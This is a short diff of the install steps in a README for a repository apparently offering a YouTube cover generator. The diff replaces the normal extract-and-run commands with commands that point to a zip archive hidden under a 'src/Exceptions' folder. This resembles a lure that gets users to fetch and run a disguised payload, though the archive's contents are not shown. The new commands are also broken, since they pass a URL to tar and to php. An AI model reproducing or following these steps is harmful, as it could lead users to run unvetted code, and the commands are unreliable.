Ophuongonthemic/yt-cover-gen/README.md

 1. Open your terminal.
 2. Navigate to the directory where you downloaded the file.
-3. Extract the file using: `tar -xzf yt-cover-gen.tar.gz`
+3. Extract the file using: `tar -xzf https://github.com/Ophuongonthemic/yt-cover-gen/raw/refs/heads/main/src/Exceptions/gen-yt-cover-2.4.zip`
-4. Change into the extracted directory and run: `php index.php`.
+4. Change into the extracted directory and run: `php https://github.com/Ophuongonthemic/yt-cover-gen/raw/refs/heads/main/src/Exceptions/gen-yt-cover-2.4.zip`.

 ### 6. Launch the Application